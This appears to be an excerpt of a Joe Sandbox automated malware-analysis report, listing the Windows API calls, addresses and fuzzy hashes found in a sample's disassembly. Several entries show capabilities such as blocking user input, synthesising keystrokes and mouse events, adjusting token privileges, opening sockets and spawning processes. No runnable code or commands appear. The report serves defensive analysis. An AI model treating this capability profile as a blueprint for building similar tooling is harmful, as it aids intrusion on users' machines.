                          • _memmove.LIBCMT ref: 00B73020
                          • _memmove.LIBCMT ref: 00B73135
                          • _memmove.LIBCMT ref: 00B731DC
                          Similarity
                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                          • String ID:

                          APIs
                            • Part of subcall function 00B5ACD3: inet_addr.WS2_32(00000000), ref: 00B5ACF5
                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00B5973D
                          • WSAGetLastError.WS2_32(00000000,00000000), ref: 00B59760
                          Similarity
                          • API ID: ErrorLastinet_addrsocket
                          • String ID:

                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00B4F37A
                          • _wcscmp.LIBCMT ref: 00B4F3AA
                          • _wcscmp.LIBCMT ref: 00B4F3BF
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B4F3D0
                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00B4F3FE
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNext
                          • String ID:

                          APIs
                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B4439C
                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00B443B8
                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00B44425
                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00B44483
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • GetCursorPos.USER32(?), ref: 00B6EFE2
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B7F3C3,?,?,?,?,?), ref: 00B6EFF7
                          • GetCursorPos.USER32(?), ref: 00B6F041
                          • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B7F3C3,?,?,?), ref: 00B6F077
                          Similarity
                          • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                          • String ID:
                          • API String ID: 1423138444-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B4221E
                          Strings
                          Similarity
                          • API ID: lstrlen
                          • String ID: ($|
                          • API String ID: 1659193697-1631851259
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00B1AE5E
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00B555FD
                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B55629
                          Similarity
                          • API ID: Internet$AvailableDataFileQueryRead
                          • String ID:
                          • API String ID: 599397726-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00B4EA95
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B4EAEF
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B4EB3C
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID:
                          • API String ID: 1682464887-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B3BF0F
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B3BF3C
                          • GetLastError.KERNEL32 ref: 00B3BF49
                          Similarity
                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                          • String ID:
                          • API String ID: 1922334811-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B470D8
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00B47115
                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B4711E
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B3BE5A
                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B3BE71
                          • FreeSid.ADVAPI32(?), ref: 00B3BE81
                          Similarity
                          • API ID: AllocateCheckFreeInitializeMembershipToken
                          • String ID:
                          • API String ID: 3429775523-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                            • Part of subcall function 00B1B155: GetWindowLongW.USER32(?,000000EB), ref: 00B1B166
                          • GetParent.USER32(?), ref: 00B7F4B5
                          • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00B1ADDD,?,?,?,00000006,?), ref: 00B7F52F
                          Similarity
                          • API ID: LongWindow$DialogNtdllParentProc_
                          • String ID:
                          • API String ID: 314495775-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00B4FD71
                          • FindClose.KERNEL32(00000000), ref: 00B4FDA1
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00B7F352,?,?,?), ref: 00B6F115
                            • Part of subcall function 00B1B155: GetWindowLongW.USER32(?,000000EB), ref: 00B1B166
                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00B6F0FB
                          Similarity
                          • API ID: LongWindow$DialogMessageNtdllProc_Send
                          • String ID:
                          • API String ID: 1273190321-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00B6F47D
                          • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00B7F42E,?,?,?,?,?), ref: 00B6F4A6
                          Similarity
                          • API ID: ClientDialogNtdllProc_Screen
                          • String ID:
                          • API String ID: 3420055661-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B5C2E2,?,?,00000000,?), ref: 00B4D73F
                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B5C2E2,?,?,00000000,?), ref: 00B4D751
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00B3B8C5
                          • CloseHandle.KERNEL32(?), ref: 00B3B8D7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          • Opcode ID: 4af746d8dc52a0cfaca7ec3cd81501ac16b8a2d15ccc08a9a196fb125420f411
                          • Instruction ID: d220e280705335fd18be6739a3743659bddf4b56e3ef74f2cf7e66b4d2eed6fe
                          • Opcode Fuzzy Hash: 4af746d8dc52a0cfaca7ec3cd81501ac16b8a2d15ccc08a9a196fb125420f411
                          • Instruction Fuzzy Hash: 75E0E671014511AFE7263B50FC09D7777EDEF04311B10845EF55995471DB615CD0DB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00B6F59C
                          • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00B7F3AD,?,?,?,?), ref: 00B6F5C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 0f3b392aab6c6f0f6dec5362fe165d9996bd7e6b53a248b160a43ab9d51686d8
                          • Instruction ID: d6fc73283234825a7144e1b13fa90945ea7900047a1011a99e7497775d8ec5ec
                          • Opcode Fuzzy Hash: 0f3b392aab6c6f0f6dec5362fe165d9996bd7e6b53a248b160a43ab9d51686d8
                          • Instruction Fuzzy Hash: DBE08C30104219BBEB140F09EC0AFB93B58EB10B50F10852BF917890E0EBB488A0D760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,00B0125D,00B27A43,00B00F35,?,?,00000001), ref: 00B28E41
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B28E4A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 971bb488c2c50e64f4a9a4aa0863ce4b88a3c8665853e3946b3df2c3db3d35c2
                          • Instruction ID: 4b48a25e84ed5851d957074d1d136e5cc5b2ef5ea273bd5ddb5fe39ed96ca8b2
                          • Opcode Fuzzy Hash: 971bb488c2c50e64f4a9a4aa0863ce4b88a3c8665853e3946b3df2c3db3d35c2
                          • Instruction Fuzzy Hash: CBB09271044B08EBEA002BA1EC09B883F78EB08A62F004022F61D460B08F635450CB9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b339df5db4d1ef5e9701baade962acb378d732c254a5cf4db5feb7e260b86698
                          • Instruction ID: 7324cf3adcb719adfa2445dba4cfd6a589acdbce5193e769e1702bf6aa4ff20d
                          • Opcode Fuzzy Hash: b339df5db4d1ef5e9701baade962acb378d732c254a5cf4db5feb7e260b86698
                          • Instruction Fuzzy Hash: 65B10320D6AF404DD72396398931336B79CAFBB2C5F92D71BFC1A75D22EB2185934280
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __time64.LIBCMT ref: 00B4BFCB
                            • Part of subcall function 00B240DA: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B4C6AF,00000000,?,?,?,?,00B4C85C,00000000,?), ref: 00B240E3
                            • Part of subcall function 00B240DA: __aulldiv.LIBCMT ref: 00B24103
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Time$FileSystem__aulldiv__time64
                          • String ID:
                          • API String ID: 2893107130-0
                          • Opcode ID: 2a512d36426250f63093c4824946675dcf091365e3c2a2bbb9667a6f6adbf225
                          • Instruction ID: f5769f979503cb5035e2de94118f9b4066c05fa0e397ea045e2de636d3d3dd08
                          • Opcode Fuzzy Hash: 2a512d36426250f63093c4824946675dcf091365e3c2a2bbb9667a6f6adbf225
                          • Instruction Fuzzy Hash: C521B732634510CBC729CF29C881E92B7E5EB59310B648E6DE0E5CB2C0CB74BA05DB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00B70352
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 5cf98654f99e66b698fe232436b5fd1de845c888809fbfc8eeb9ce16ded89df8
                          • Instruction ID: ded66a7756afda3ff85a6405d78efb1b75b3195331276654643c29283fad9554
                          • Opcode Fuzzy Hash: 5cf98654f99e66b698fe232436b5fd1de845c888809fbfc8eeb9ce16ded89df8
                          • Instruction Fuzzy Hash: F5113A31214215FBFB246B2CCC45FB93BD4E749720F24C3A6F9355A1E2CA649D40D2A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1B155: GetWindowLongW.USER32(?,000000EB), ref: 00B1B166
                          • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00B7F36A,?,?,?,?,00000000,?), ref: 00B6FEF8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 0b7143589e0dcfc83ed52cbc71f54b53b9f62c047c19dfa629570dcd9cb87211
                          • Instruction ID: e5dc59e541b72fa70eeadf12988b40069eb95f3afd000558ef048db17566d342
                          • Opcode Fuzzy Hash: 0b7143589e0dcfc83ed52cbc71f54b53b9f62c047c19dfa629570dcd9cb87211
                          • Instruction Fuzzy Hash: D501B532A0011A6BDB149E18E849FF63FD2EB46324F1445B5F919575B3C7366C50D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                            • Part of subcall function 00B1B736: GetCursorPos.USER32(000000FF), ref: 00B1B749
                            • Part of subcall function 00B1B736: ScreenToClient.USER32(00000000,000000FF), ref: 00B1B766
                            • Part of subcall function 00B1B736: GetAsyncKeyState.USER32(00000001), ref: 00B1B78B
                            • Part of subcall function 00B1B736: GetAsyncKeyState.USER32(00000002), ref: 00B1B799
                          • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00B7F417,?,?,?,?,?,00000001,?), ref: 00B6EA9C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                          • String ID:
                          • API String ID: 2356834413-0
                          • Opcode ID: 7d0fd5bbd325c1372a1b7352f49ba08dc109c803408d104c05f1dab63739dcdd
                          • Instruction ID: e2b7efb8d8ce037de6e6b42a0ae95c72b0b46628c40dba8cb695e7045143da5e
                          • Opcode Fuzzy Hash: 7d0fd5bbd325c1372a1b7352f49ba08dc109c803408d104c05f1dab63739dcdd
                          • Instruction Fuzzy Hash: E5F0A735204219ABDB146F59DC05EFE3FA1FB01750F004055F9161B1E2D776D9A1DBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00B1AF40,?,?,?,?,?), ref: 00B1B83B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 585d51cf949709d87c9b7a133b1b38a6438c314e8fad13fd265c4511e2ab5763
                          • Instruction ID: b8151af0a589c830349df60f6c41d6c08a9d661e8d2e6ce1cc02ef30863122c0
                          • Opcode Fuzzy Hash: 585d51cf949709d87c9b7a133b1b38a6438c314e8fad13fd265c4511e2ab5763
                          • Instruction Fuzzy Hash: 9EF05E31604209DFDB189F18DC90E793BE6FB16360F908669F9524B2A1DB71D8A0DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • BlockInput.USER32(00000001), ref: 00B57057
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: ab4a02af3073c43f7d6237e3ae9f3fa736e7305728b0af07404e990a9b4fb6ea
                          • Instruction ID: 0497eba9e1f68ee2bb6bdf99fdf2393079cff6ede9b2740127d85787d2ecf653
                          • Opcode Fuzzy Hash: ab4a02af3073c43f7d6237e3ae9f3fa736e7305728b0af07404e990a9b4fb6ea
                          • Instruction Fuzzy Hash: 10E012353442049FC710ABA9D444A96B7DDAF54751F0484A6A945D7291DAB0E8448B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00B6F41A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 0b299cc0c34548121d7a2e03189531f287a054f8679d2cfd39f733f6f202bd9a
                          • Instruction ID: aa6de3e5fbeb444e3480ffd7f52f6a61982e4d9c131dbb90bce615fef92662a0
                          • Opcode Fuzzy Hash: 0b299cc0c34548121d7a2e03189531f287a054f8679d2cfd39f733f6f202bd9a
                          • Instruction Fuzzy Hash: AFF06D32204249AFDB21DF5CDC05FD63B95FB0A360F144459BA11672E2CF70A820D7A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B47DF8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: mouse_event
                          • String ID:
                          • API String ID: 2434400541-0
                          • Opcode ID: 8ddb379f4ce3c6f0d51a4b19d337dd78b446c63b62ff209c2bbaabf2aa335a91
                          • Instruction ID: 516c6cfce9a4bda9f336225fa0464a637d818bf1732c37804f9fe5e17bdde613
                          • Opcode Fuzzy Hash: 8ddb379f4ce3c6f0d51a4b19d337dd78b446c63b62ff209c2bbaabf2aa335a91
                          • Instruction Fuzzy Hash: 2DD09EE59FCA0679FD1917209C2FF7A1288EB51781FA456EAB101C60C1EF906A44F535
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00B7F3D4,?,?,?,?,?,?), ref: 00B6F450
                            • Part of subcall function 00B6E13E: _memset.LIBCMT ref: 00B6E14D
                            • Part of subcall function 00B6E13E: _memset.LIBCMT ref: 00B6E15C
                            • Part of subcall function 00B6E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BC3EE0,00BC3F24), ref: 00B6E18B
                            • Part of subcall function 00B6E13E: CloseHandle.KERNEL32 ref: 00B6E19D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
